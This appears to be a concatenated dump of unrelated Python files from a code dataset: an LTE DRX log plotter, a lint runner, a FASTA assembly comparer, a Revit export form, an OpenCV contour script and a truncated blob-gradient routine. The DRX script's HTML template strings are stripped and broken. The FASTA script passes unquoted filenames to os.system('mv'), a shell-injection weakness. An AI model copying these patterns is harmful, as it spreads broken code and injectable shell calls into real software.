Read from EM event, move to Validation list\n ####\n\n m = re.search(\"DRX_WAKUP_LONGCYCLE\", line)\n if m:\n if drxLongCycle <= 0:\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n drxLongCycle = 1\n\n m = re.search(\"DRX_WAKEUP_SHORTCYCLE\", line)\n if m:\n if drxShortCycle <= 0:\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n drxShortCycle = 1\n\n m = re.search(\"ULMACCE_LISTMGROBS_SR\", line)\n if m:\n srReceived = 0\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n srReceived = 1\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n srReceived = 0\n\n ####\n #### Write to EM events, move to Non validation list\n ####\n\n m = re.search(\"DRX_INACTIVITY_STOP\", line)\n if m:\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" -0.5\\n\")\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n\n m = re.search(\"UE_OUTOFSYNC\", line)\n if m:\n if(drxLongCycle == 1):\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n drxLongCycle = 0\n\n if(drxShortCycle == 1):\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n drxShortCycle = 0\n\n m = re.search(\"DRX_SLEEP_SHORTCYCLE\", line) or re.search(\"DRX_SLEEP_LONGCYCLE\", line)\n if m:\n if(drxShortCycle == 1):\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n drxShortCycle = 0\n\n if(drxLongCycle == 1):\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n drxLongCycle = 0\n srReceived = 0\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n\n m = re.search(\"DC_DT=\\[([0-9]+) ([0-9]+)]\", line)\n if m:\n DC = m.group(1)\n DT = m.group(2)\n DC_DT.write(str(sfnTimePrint) + \" \" + str(DC) + \".\" + str(DT) + \"\\n\")\n\n m = re.search(\"newDrxConfigIndex(\\s|=)([0-9]+)\", line)\n if m:\n newDrxConfigIndex = float(m.group(2))/100\n NEWDRXCONFIGINDEX.write(str(sfnTimePrint) + \" \" + str(newDrxConfigIndex) + \"\\n\")\n\n m = re.search(\"newLongDrxCycle(\\s|=)([0-9]+)\", line)\n if m:\n newLongDrxCycle = float(m.group(2))/100\n NEWLONGDRXCYCLE.write(str(sfnTimePrint) + \" \" + str(newLongDrxCycle) + \"\\n\")\n\n m = re.search(\"newDrxStartOffset(\\s|=)([0-9]+)\", line)\n if m:\n newDrxStartOffset = float(m.group(2))/100\n NEWDRXSTARTOFFSET.write(str(sfnTimePrint) + \" \" + str(newDrxStartOffset) + \"\\n\")\n\n ############################################################################\n\n for line in f: # read the parsed log file\n m = re.search(\"0x[0-9abcdef]+=\", line) or re.search(\"^\\[[-:. 0-9]+\\]\", line)\n if m: # example \"0x5051e916=\"\"\n noOfTraceBlocks+=1\n if(begin == 0):\n begin = 1\n traceblock.append(line)\n else:\n checkTraceblock()\n del traceblock[:]\n traceblock.append(line)\n else:\n if(begin == 1):\n traceblock.append(line)\n else:\n checkTraceblock()\n\n #####################################\n ## Calculating DRX Sleep Ratio\n #####################################\n DRXDLFILE = open(dirname + os.sep + match + \"_drx_dl.txt\", 'r')\n\n prevLine = None\n pts = []\n ON = 0.0\n ALL = 0.0\n prevRow0 = None\n firstLine = 1\n\n for line in DRXDLFILE:\n row = line.split()\n if firstLine:\n prevRow0 = int(row[0])\n firstLine = 0\n if (line != prevLine) and (line not in pts):\n pts.append(line)\n if (int(row[0]) != prevRow0):\n ALL += int(row[0]) - prevRow0\n prevRow0 = int(row[0])\n if (int(row[1]) == 1):\n ON+=1.0\n\n print(\" Sfn Time Wrap handled! Number of sfn wraps: \" + str(sfnWrap) + \"\\n\")\n\n totTti = (lastTti - firstTti)/1000.0\n print(\" Trace length: \" + str(totTti) + \" seconds\\n\")\n print(\" Missed TTIs: \" + str(missedTti) + \"\\n\")\n print(\" Time gap of more than 10 ms exists! \\n\")\n print(\" DRX Sleep Ratio is: %.2f%%\\n\" % (((ALL-ON)/ALL)*100))\n\n if((ulDrxTraceAvailable == 0) or (dlDrxTraceAvailable == 0)):\n print(\" UL and/or DL DRX traces are missing from the logfile. The plot information might not be enough to get a proper graph!\\n\")\n print(\" UL = \" + str(ulDrxTraceAvailable) + \", DL = \" + str(dlDrxTraceAvailable))\n\n f.close()\n RXPOWERPUSCHFILE.close()\n ULNEWTBSFILE.close()\n ULRETXTBSFILE.close()\n DLNEWFILE.close()\n DLRETXFILE.close()\n DLTBSFILE.close()\n PUCCHSRFILE.close()\n ULSINRFILE.close()\n DRXDLFILE.close()\n DRXULFILE.close()\n DRXFILE.close()\n ULHARQACKFILE.close()\n ULHARQNACKFILE.close()\n DRXUPDATEFILE.close()\n DRXDLSKIPONDURATION.close()\n TIMESTAMP.close()\n NEWDRXCONFIGINDEX.close()\n NEWDRXSTARTOFFSET.close()\n NEWLONGDRXCYCLE.close()\n DC_DT.close()\n INCONSISTENCY.close()\n\n'''***************************************************************************************************************************************************************************************************************************\n******************************************************************************************************************************************************************************************************************************\n******************************************************************************************************************************************************************************************************************************'''\n\nfor match in matches:\n if match in FoldersExist:\n continue\n\n dirname = \".\" + os.sep + match + \"_\" + os.path.basename(log_file)\n DRXDLFILE = open(dirname + os.sep + match + \"_drx_dl.txt\", 'r')\n DRXFILE = open(dirname + os.sep + match + \"_rx_event_ul.txt\", 'r')\n DRXULFILE = open(dirname + os.sep + match + \"_drx_ul.txt\", 'r')\n RXPOWERPUSCHFILE = open(dirname + os.sep + match + \"_rxpower_pusch.txt\", 'r')\n ULNEWTBSFILE = open(dirname + os.sep + match + \"_ultbs_new.txt\", 'r')\n ULRETXTBSFILE = open(dirname + os.sep + match + \"_ultbs_retx.txt\", 'r')\n DLNEWFILE = open(dirname + os.sep + match + \"_dl_new.txt\", 'r')\n DLRETXFILE = open(dirname + os.sep + match + \"_dl_retx.txt\", 'r')\n DLTBSFILE = open(dirname + os.sep + match + \"_dltbs.txt\", 'r')\n PUCCHSRFILE = open(dirname + os.sep + match + \"_sr.txt\", 'r')\n ULSINRFILE = open(dirname + os.sep + match + \"_ulsinr.txt\", 'r')\n ULHARQACKFILE = open(dirname + os.sep + match + \"_ulharqack.txt\", 'r')\n ULHARQNACKFILE = open(dirname + os.sep + match + \"_ulharqnack.txt\", 'r')\n DRXUPDATEFILE = open(dirname + os.sep + match + \"_drxupdateind.txt\", 'r')\n DRXDLSKIPONDURATION = open(dirname + os.sep + match + \"_drxdl_skip_onduration.txt\", 'r')\n TIMESTAMP = open(dirname + os.sep + match + \"_timestamp.txt\", 'r')\n NEWDRXCONFIGINDEX = open(dirname + os.sep + match + \"_new_drx_config_index.txt\", 'r')\n NEWDRXSTARTOFFSET = open(dirname + os.sep + match + \"_new_drx_start_offset.txt\", 'r')\n NEWLONGDRXCYCLE = open(dirname + os.sep + match + \"_new_long_drx_cycle.txt\", 'r')\n DC_DT = open(dirname + os.sep + match + \"_dc_dt.txt\", 'r')\n INCONSISTENCY = open(dirname + os.sep + match + \"_inconsistency.txt\", 'r')\n\n\n first = next(TIMESTAMP).decode()\n TIMESTAMP.seek(-1024, 2)\n last = TIMESTAMP.readlines()[-1].decode()\n\n row = first.split()\n firstSfn = int(row[0])\n\n row = last.split()\n lastSfn = int(row[0])\n\n nrOfSfn = lastSfn - firstSfn\n\n TIMESTAMP.seek(0)\n\n maxSfnPerPage = 8000\n nrOfFile = math.ceil(nrOfSfn/float(maxSfnPerPage))\n totalFiles = int(nrOfFile)\n print('totalfiles',totalFiles)\n \n print(firstSfn, lastSfn, first, last)\n last_pos1 = TIMESTAMP.tell()\n last_pos2 = DRXDLFILE.tell()\n last_pos3 = DRXULFILE.tell()\n last_pos4 = RXPOWERPUSCHFILE.tell()\n last_pos5 = ULNEWTBSFILE.tell()\n last_pos6 = ULRETXTBSFILE.tell()\n last_pos7 = DLNEWFILE.tell()\n last_pos8 = DLRETXFILE.tell()\n last_pos9 = DLTBSFILE.tell()\n last_pos10 = PUCCHSRFILE.tell()\n last_pos11 = ULSINRFILE.tell()\n last_pos12 = ULHARQACKFILE.tell()\n last_pos13 = ULHARQNACKFILE.tell()\n last_pos14 = DRXUPDATEFILE.tell()\n last_pos15 = DRXDLSKIPONDURATION.tell()\n last_pos16 = NEWDRXCONFIGINDEX.tell()\n last_pos17 = NEWDRXSTARTOFFSET.tell()\n last_pos18 = NEWLONGDRXCYCLE.tell()\n last_pos19 = DC_DT.tell()\n last_pos20 = INCONSISTENCY.tell()\n last_pos21 = DRXFILE.tell()\n\n if nrOfFile > 1:\n print(' Number of data points exceed limit for a single HTML page.\\n')\n print(' Multiple HTML pages are created. Only the first will be launched automatically.\\n')\n print(' Refer to ' + dirname + ' to manually launch desired HTML page.')\n\n print (\"\\n***************************************************************************************\\n\")\n n = 0\n\n firstfile = 1\n pts = []\n x1 = []\n y1 = []\n y2 = []\n y3 = []\n y4 = []\n y5 = []\n timestamp = []\n\n while nrOfFile > 0:\n n+=1\n minRange = firstSfn\n maxRange = 0\n pg = dirname + os.sep + match + \"_\" + os.path.basename(log_file) + \"_\" + str(int(n)) + \".html\"\n f = open(pg, 'w')\n nrOfFile-=1\n\n f.write('''\n <!doctype html>\n <html>\n <head>\n <title>''' + 'DRX Plot For UE: ' + str(match) +'''\n \n\n \n\n \n \n

Note: A greyed out trace is disabled. To show a information for a trace, please click on it to enable it.

\n \n \n \n \n \n ''')\n i = totalFiles\n f.write('''\n ''')\n f.write('''\n \n
\n
\n Range X1 (Minimum Sfn: ''' + str(minRange) + '''):\n \n Range X2 (Maximum Sfn: ''' + str(maxRange) + '''):\n \n
\n
\n \n ''')\n\n\n totalFiles = 0\n for file in os.listdir(dirname):\n if file.endswith(\".html\"):\n totalFiles+=1\n\n nrOfFile = totalFiles\n n = 0\n while nrOfFile > 0:\n n+=1\n pg = dirname + os.sep + match + \"_\" + os.path.basename(log_file) + \"_\" + str(int(n)) + \".html\"\n f = open(pg, 'a')\n nrOfFile-=1\n\n if (n-1) is not 0:\n f.write('''
\n \n
\n
\n \n ''')\n if (n+1) <= totalFiles:\n f.write('''
\n >\" class=\"next\">\n
\n
\n \n \n ''')\n\n f.close()\n if firstfile:\n new = 2 # open in a new tab, if possible\n url = pg\n webbrowser.open(url,new=new)\n firstfile = 0\n\n RXPOWERPUSCHFILE.close()\n ULNEWTBSFILE.close()\n ULRETXTBSFILE.close()\n DLNEWFILE.close()\n DLRETXFILE.close()\n DLTBSFILE.close()\n PUCCHSRFILE.close()\n ULSINRFILE.close()\n DRXDLFILE.close()\n DRXULFILE.close()\n DRXFILE.close()\n ULHARQACKFILE.close()\n ULHARQNACKFILE.close()\n DRXUPDATEFILE.close()\n DRXDLSKIPONDURATION.close()\n TIMESTAMP.close()\n NEWDRXCONFIGINDEX.close()\n NEWDRXSTARTOFFSET.close()\n NEWLONGDRXCYCLE.close()\n DC_DT.close()\n INCONSISTENCY.close()\n","sub_path":"drx_old-b631c30b4be09f6e9d7b01b630739a20.py","file_name":"drx_old-b631c30b4be09f6e9d7b01b630739a20.py","file_ext":"py","file_size_in_byte":77123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"131575883","text":"#!/usr/bin/env python\n\nimport hashlib\nimport os\nimport pickle\nimport subprocess\nimport sys\n\nfrom core import *\nimport generic_lint\n\n\n\n# Constants\n\ndirs_to_ignore = [\".stack-work\", \".build-work\"]\ntmp_dir = \"./.build-work/tmp/\"\ncache_file = tmp_dir + \"lint_cache.pickle\"\n\n\n\n# Implementation\n\ndef perform_lint(dirs):\n # Load the set of files known to be good\n known_good_hashes = set()\n if os.path.isfile(cache_file):\n known_good_hashes = pickle.load(open(cache_file, \"rb\"))\n\n # Lint any files that are not known to be good\n all_files = sum(map(files_in_dir, dirs), [])\n allowed_files = filter(is_allowed_file, all_files)\n code_files = filter(is_code_file, allowed_files)\n success = True\n for file in code_files:\n # Determine the file's hash\n with open(file, \"rb\") as f:\n hasher = hashlib.sha1()\n hasher.update(f.read())\n file_hash = hasher.hexdigest()\n\n # If the file isn't known to be good, then lint it\n if not (file_hash in known_good_hashes):\n file_success = lint_file(file)\n success = success and file_success\n if file_success:\n known_good_hashes.add(file_hash)\n\n # Write the updated set of known good files to the cache\n mkdir_p(tmp_dir)\n pickle.dump(known_good_hashes, open(cache_file, \"wb\"))\n\n return success\n\ndef lint_file(file):\n success = generic_lint.run_for(file)\n if is_haskell_file(file):\n cmd = [\"hlint\", \"--no-summary\", \"--hint=tools/lint/HLint\", file]\n hlint_exit = subprocess.call(cmd)\n hlint_success = (hlint_exit == 0)\n success = success and hlint_success\n\n return success\n\ndef is_allowed_file(file):\n path_components = file.split(\"/\")\n if len(path_components) > 1:\n return not (path_components[1] in dirs_to_ignore)\n else:\n return True\n\nif __name__ == \"__main__\":\n success = perform_lint([\".\"])\n sys.exit(None if success else 1)\n","sub_path":"tools/lint/full_lint.py","file_name":"full_lint.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"568228102","text":"#!/usr/bin/python\n\nimport sys\nimport os\nimport os.path\nimport argparse\nimport re\nimport string\nimport logging\nimport warnings\n\n## simpleFastaStats.py takes a single fasta-formatted DNA/RNA text file and\n## outputs contig count, average contig length, N50 contig lengths, maximum contig length, and cumulative contig length\n\n## Function: A closure for file extension checking\n\ndef ext_check(expected_ext, openner):\n def extension(filename):\n if not filename.lower().endswith(expected_ext):\n raise ValueError()\n return openner(filename)\n return extension\n\n## Function: Filename extractor from filepath\ndef getIsolateID(filePathString):\n\tsplitStr = re.split(pattern='/', string=filePathString)\n\tfileNameIdx = len(splitStr) - 1\n\tisolateString = re.split(pattern='\\.', string=splitStr[fileNameIdx])\n\tif(len(isolateString[0]) < 10):\n\t\tisolateString = re.split(pattern='\\.', string=splitStr[0])\n\treturn isolateString[0]\n\n## Function: Checks existence of --outDir\ndef readable_dir(prospective_dir):\n\tif not os.path.isdir(prospective_dir):\n \t\traise argparse.ArgumentTypeError(\"readable_dir:{0} is not a valid path\".format(prospective_dir))\n\tif os.access(prospective_dir, os.R_OK):\n\t\tif( not prospective_dir.endswith(\"/\") ):\n\t\t\tprospective_dir = prospective_dir + \"/\"\n\t\treturn prospective_dir\n\telse:\n\t\traise argparse.ArgumentTypeError(\"readable_dir:{0} is not a readable dir\".format(prospective_dir))\n\n\nparser = argparse.ArgumentParser(description='compare average contig and contig counts among multiple .fasta, move lower quality assemblies to Hel', usage=\"multiFastaContigAvgJudgement.py filepath/input.assembly*.fasta --minLength 500(default) --format [brief(default)|verbose|tsv|csv]\")\n\nparser.add_argument(\"filename\",type=ext_check('.fasta', argparse.FileType('r')), nargs='+')\n\n## output folder\nparser.add_argument('--outDir', '-D', type=readable_dir, required=True, action='store')\n\n## minimum contig length\nparser.add_argument(\"--minLength\", '-min', default='500', type=int)\n\nparser.add_argument(\"--format\", default='brief', type = lambda s : s.lower(), choices=['tsv', 'csv', 'brief', 'verbose', 'c', 's', 'b', 'v'])\n\n## arrays of dict type variables\n#GenomeDrafts = []\n#GenomeContigs = []\n\ninFileName = []\n\ndraftContigs = []\ndraftGenome = {}\ncontigLengths = {}\nidCount = 0\ncontigID = \"\"\ncontigStr = \"\" \n\ncontigCount = []\nmaxContig = []\ncontigN50 = []\ndrLength = 0\ndraftLength = []\navgContig = []\n\nargs = parser.parse_args()\n\nhelHeim = args.outDir\n\nintMinLen = args.minLength\n\nidxFile = 0\n\n##### Begin logging #####\n\nlogger = logging.getLogger(\"multiFastaContigAvgJudgement.py\")\nlogger.setLevel(logging.INFO)\nch = logging.StreamHandler()\nch.setLevel(logging.INFO)\nformatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\nif(len(args.filename) < 2):\n\tprint(\"Input Error: Two or more .fasta files required!\")\n\tsys.exit(1)\n\n##### Begin multiple input file loop #####\n\nfor filehandle in args.filename:\n\tinFileName.append(getIsolateID(filehandle.name))\n\t\n\t## First inner loop to read input file lines\n\n\tfor line in filehandle:\n\t\tif(re.search(r'^>', line)):\n\t\t\tif(idCount > 0):\n\t\t\t\tdraftGenome[contigID] = contigStr\n\t\t\t\tcontigID = \"\"\n\t\t\t\tcontigStr = \"\"\n\t\t\tcontigID = line.strip()\n\t\t\tif(re.search(r'\\(paired\\)', contigID)):\n\t\t\t\tcontigID = contigID.replace('_(paired)', '')\n\t\t\tif(re.search('R1_001_', contigID)):\n\t\t\t\tcontigID = contigID.replace('R1_001_', '')\n\t\t\tdraftContigs.append(contigID)\n\t\t\tidCount = idCount + 1\n\t\t\t#print(contigID)\n\t\telif(re.search(r'^(A|T|G|C|U|N)+', line)):\n\t\t\tcontigStr = contigStr + line.strip()\n\n\n\tdraftGenome[contigID] = contigStr\n\n\t### End first inner loop\n\n\t## Close input file\n\tfilehandle.close()\n\n\t### Second inner loop to populate dict of contig lengths\n\n\tfor contigKey in draftGenome:\n\t\tif( len(draftGenome[contigKey]) > (intMinLen - 1) ):\n\t\t\tcontigLengths[contigKey] = len(draftGenome[contigKey])\n\t\t\t##print(contigKey + \" => \" + str(contigLengths[contigKey]))\n\n\t### End second innner loop\n\n\tcount = 0\n\n\t### Third inner loop to find longest contig and contig count given length > intMinLen\n\n\tfor contigID in sorted(contigLengths, key=contigLengths.__getitem__, reverse=True):\n\t\tif( contigLengths[contigID] > (intMinLen - 1) ):\n\t\t\tif(count == 0):\n\t\t\t\tmaxContig.append(contigLengths[contigID])\n\t\t\t\ttop = 1\n\t\t\tcount = count + 1\n\t\t\tdrLength = drLength + contigLengths[contigID]\n\tdraftLength.append(drLength)\n\t\n\t### End third inner loop\n \n\tcontigCount.append(count)\n\n\tavgContig.append(draftLength[idxFile]/contigCount[idxFile])\n\n\t### to compute N50, find the contig that 'resides' at 1/2 of draftLength\n\t\n\tdrLength = 0\n\tcumulativeLength = 0;\n\n\t### Fourth inner loop to calculate N50\n\t\n\tfor contigID in sorted(contigLengths, key=contigLengths.__getitem__, reverse=True):\n\t\tif( contigLengths[contigID] > (intMinLen - 1) ):\n\t\t\tcumulativeLength = cumulativeLength + contigLengths[contigID]\n\t\tif(cumulativeLength > (draftLength[idxFile]/2)):\n\t\t\tcontigN50.append(contigLengths[contigID])\n\t\t\tbreak\n\t\n\t### End fourth inner loop\n\n\tdraftContigs = []\n\tdraftGenome = {}\n\tcontigLengths = {}\n\tidCount = 0\n\tcontigID = \"\"\n\tcontigStr = \"\" \n\n\tidxFile = idxFile + 1\n\n##### End of multiple input file loop #####\t\n\nidx = 0\n\nfor idx in range(len(inFileName)):\n\tif ( args.format == 'verbose' or args.format == 'v' ):\n\t\tprint(\"Assembly File\\tMinimum Contig Length:\\tcontigCount\\tavgContig\\tN50\\tmaxContig\\tdraftLength\")\n\t\tprint(\"{}\\t\".format(inFileName[idx]), \">\", intMinLen - 1 ,\"bp:\\t\", contigCount[idx], \"\\t\", \"%.0f\" % avgContig[idx], \"\\t\", contigN50[idx], \"\\t\", maxContig[idx], \"\\t\", draftLength[idx])\n\telif( args.format == 'brief' or args.format == 'b' ):\n\t\tprint(\"Assembly\\tcontigCount\\tavgContig\\tN50\\tmaxContig\")\n\t\tprint(inFileName[idx] + \"\\t\" + str(contigCount[idx]) + \"\\t\" + str(\"%.0f\" % avgContig[idx]) + \"\\t\" + str(contigN50[idx]) + \"\\t\" + str(maxContig[idx]))\n\telif ( args.format == 'tsv' or args.format == 't'):\n\t\tprint(str(contigCount[idx]) + \"\\t\" + str(\"%.0f\" % avgContig[idx]) + \"\\t\" + str(contigN50[idx]) + \"\\t\" + str(maxContig[idx]))\n\telif ( args.format == 'csv' or args.format == 'c' ):\n\t\tprint(inFileName[idx] + \",\" + str(contigCount[idx]) + \",\" + str(\"%.0f\" % avgContig[idx]) + \",\" + str(contigN50[idx]) + \",\" + str(maxContig[idx]))\n\tidx = idx + 1\n\n\t\n### Judgement Day ### \n### All assembly files are sent to Hel except for theWorthy ###\n\n## index of the file with optimal assembly metrics\ntheWorthy = 0\n\nfor helCount in range( 1, len(inFileName) ):\n\tif(avgContig[helCount] > avgContig[theWorthy]):\n\t\ttheWorthy = helCount\n\t\t##print(theWorthy, \" \", avgContig[helCount], \" \", avgContig[theWorthy])\n\telif(contigCount[helCount] < contigCount[theWorthy]):\n\t\ttheWorthy = helCount\n\t\t\t\nidx = 0\n\nfor idx in range( len(inFileName) ):\n\tif(idx != theWorthy):\n\t\tos.system(\"mv -v {} {}\".format(args.filename[idx].name, helHeim))\n\n","sub_path":"multiFastaContigAvgJudgement.py","file_name":"multiFastaContigAvgJudgement.py","file_ext":"py","file_size_in_byte":6891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"241151537","text":"import revitron\nfrom revitron import _\nfrom rpw.ui.forms import FlexForm, TextBox, Button, Label, Separator, ComboBox\nfrom collections import defaultdict\nimport System.Windows\n\ndef addFields(components, fields):\n for field in fields:\n if field == '---':\n components.append(Separator())\n else:\n \tkey = revitron.String.sanitize(field)\n \tcomponents.append(Label(field))\n \tcomponents.append(TextBox(key, Text=config.get(key)))\n return components\n\nif not revitron.Document().isFamily():\n \n config = revitron.DocumentConfigStorage().get('revitron.export', defaultdict())\n \n components = addFields([], \n [\n 'Sheet Export Directory',\n 'Sheet Naming Template',\n 'Sheet Size Parameter Name',\n 'Default Sheet Size',\n 'Sheet Orientation Parameter Name'\n ])\n\n orientationField = 'Default Sheet Orientation'\n orientationKey = revitron.String.sanitize(orientationField)\n orientations = ['Landscape', 'Portrait']\n default = orientations[0]\n if config.get(orientationKey) in orientations:\n default = config.get(orientationKey)\n components.append(Label(orientationField))\n components.append(ComboBox(orientationKey, orientations, default=default))\n \n components = addFields(components, \n [\n '---',\n 'PDF Printer Address',\n 'PDF Temporary Output Path',\n '---',\n 'DWG Export Setup'\n ])\n \n components.append(Label(''))\n components.append(Button('Save', Width=100, HorizontalAlignment=System.Windows.HorizontalAlignment.Right))\n \n form = FlexForm('Revitron PDF and DWG Export Settings', components)\n form.show()\n \n if form.values: \n revitron.DocumentConfigStorage().set('revitron.export', form.values)\n \n \n ","sub_path":"Revitron.tab/Revitron.panel/Export.pulldown/Export Settings.pushbutton/Export Settings_script.py","file_name":"Export Settings_script.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"128175807","text":"#!/Users/jj/.virtualenvs/deep/bin/python\n\nPATH = \"./tmp/\"\nRESULT_PATH = \"./res/\"\nRES_NAME = \"blackboxed.jpg\"\n\n\ndef show_image(img_path):\n \"\"\"\n Return Image\n :param img_path: Image Path you want to show\n :return: no value, show image\n \"\"\"\n from matplotlib import pyplot as plt\n\n dpi = 200 # control parameter\n im_data = plt.imread(img_path)\n _channel = im_data.shape\n fig_size = _channel[0] / float(dpi), _channel[1] / float(dpi)\n\n plt.figure(figsize=fig_size)\n plt.xticks([]), plt.yticks([])\n plt.imshow(im_data)\n plt.show()\n\n\ndef black_box(input_path):\n \"\"\"\n Using Black-Box Algorithm (==Double Contours)\n :param input_path: image path\n :return: cv2 object(list) by black-box algorithm\n \"\"\"\n import cv2\n raw_image = cv2.imread(input_path)\n first_img = raw_image.copy()\n\n img_to_gray = cv2.cvtColor(first_img, cv2.COLOR_BGR2GRAY)\n _, thresh = cv2.threshold(img_to_gray, 127, 255, 0)\n _, contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # first-contours\n for c in contours:\n x, y, w, h = cv2.boundingRect(c)\n channel_shape = first_img.shape\n if w < channel_shape[0] * 0.05:\n cv2.rectangle(first_img, (x, y), (x + w + 10, y + h), (0, 0, 0), -1)\n\n last_img = raw_image.copy()\n img_to_gray_ = cv2.cvtColor(first_img, cv2.COLOR_BGR2GRAY)\n cv2.Canny(img_to_gray_, 50, 200, apertureSize=3)\n blur_ = cv2.blur(img_to_gray_, (5, 5))\n cv2.threshold(blur_, 127, 255, 0)\n _, contours, _ = cv2.findContours(blur_, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # second-contours\n idx = 0\n for cnt in contours:\n idx += 1\n x, y, w, h = cv2.boundingRect(cnt)\n channel = last_img.shape\n if (w / h > 8) & (w / h < 15):\n cv2.rectangle(last_img, (x, y), (x + w + 10, y + h), (0, 255, 0), 3)\n cv2.putText(last_img, str(idx), (x, y), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 255), 4)\n print(\"contour details\\t\", 'x : ', x, 'y : ', y, 'w : ', w, 'h : ', h, channel, w / channel[0]\n , h / channel[1], w / h)\n '''\n if idx == 529:\n cv2.imwrite(SAVE_PATH + \"box/\" + input_path[-11:-4] + \".png\", raw_image[y : y + h, x : x + w])\n '''\n\n cv2.imwrite(RESULT_PATH + input_path[-11:-4] + '_' + RES_NAME, last_img)\n print('Saving image finished!! ')\n\n return last_img\n\n\nif __name__ == '__main__':\n import matplotlib\n import sys\n\n matplotlib.use('TkAgg') # TkAgg line is for Mac.\n\n file_name = sys.argv[1]\n black_box_return = black_box(PATH + file_name)\n show_image(RESULT_PATH + file_name[:-4] + '_' + RES_NAME)\n","sub_path":"predict-digit/blackbox.py","file_name":"blackbox.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"70738417","text":"# coding: utf-8\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\n\n#正态分布N~(3,1)\nX1 = np.random.randn(2,25)+3\n#正态分布N~(10,1)\nX2 = np.random.randn(2,25)+10\n\nX = np.hstack((X1,X2))\n#显示\nplt.plot(X1[0],X1[1],'bo')\nplt.plot(X2[0],X2[1],'ro')\nplt.show()\n\n\n\n\n\n#聚类簇数\nk=2\ndef dist(C1,C2):\n '''\n 计算两个簇之间的平均值的距离\n '''\n C1 = list(C1)\n C2 = list(C2)\n len_C1 = len(C1)\n len_C2 = len(C2)\n if len_C1==1:\n C1_dist = C1\n else:\n C1 = np.array(C1)\n C1 = C1.reshape(len_C1,2)\n C1_dist = np.mean(C1,0)\n if len_C2==1:\n C2_dist = C2\n else:\n C2 = np.array(C2)\n C2 = C2.reshape(len_C2,2)\n C2_dist = np.mean(C2,0)\n distance = np.sqrt(np.sum((np.array(C1_dist)-np.array(C2_dist))**2))\n return distance\n\n\n#初始化聚类簇\nC=defaultdict(set)\nfor num in range(X.shape[1]):\n C[num].add(tuple(X[:,num]))\n#初始化距离矩阵\nM = np.zeros((X.shape[1],X.shape[1]))#簇距离矩阵\nfor i in range(X.shape[1]):\n for j in range(X.shape[1]):\n M[i][j]= dist(C[i],C[j])\n#初始化当前聚类簇个数\ncurrent_k = X.shape[1]\n\nwhile current_k >k:\n dist_min_i=0\n dist_min_j=1\n dist_min = M[dist_min_i][dist_min_j]\n #找出距离最近的两个聚类簇合并\n for i in range(current_k):\n for j in range(current_k):\n temp = M[i][j]\n if i!=j and temp octant), (cos__> octant)\n mdly__, mdlx__ = ~(up__ | dwn__), ~(lft__ | rgt__)\n # merge in 4 bilateral axes\n axes_mask__ = [\n mdly__ & (rgt__ | lft__), (dwn__ & rgt__) | (up__ & lft__), # 0, 45 deg\n (dwn__ | up__) & mdlx__, (dwn__ & lft__) | (up__ & rgt__), # 90, 135 deg\n ]\n max_mask__ = np.zeros_like(blob.mask__, dtype=bool)\n # local max from cross-comp in each axis:\n for axis_mask__, (ydir, xdir) in zip(axes_mask__, ((0,1),(1,1),(1,0),(1,-1))): # y,x direction per axis\n # axis AND mask:\n mask__ = axis_mask__ & blob.mask__\n y_, x_ = mask__.nonzero()\n # neighbors:\n yn1_, xn1_ = y_ + ydir, x_ + xdir\n yn2_, xn2_ = y_ - ydir, x_ - xdir\n # computed vals\n axis1_ = (0 <= yn1_) & (yn1_ < Y) & (0 <= xn1_) & (xn1_ < X)\n axis2_ = (0 <= yn2_) & (yn2_ < Y) & (0 <= xn2_) & (xn2_ < X)\n # compare values\n not_max_ = np.zeros_like(y_, dtype=bool)\n not_max_[axis1_] |= (g__[y_[axis1_], x_[axis1_]] < g__[yn1_[axis1_], xn1_[axis1_]])\n not_max_[axis2_] |= (g__[y_[axis2_], x_[axis2_]] < g__[yn2_[axis2_], xn2_[axis2_]])\n # select maxes\n mask__[y_[not_max_], x_[not_max_]] 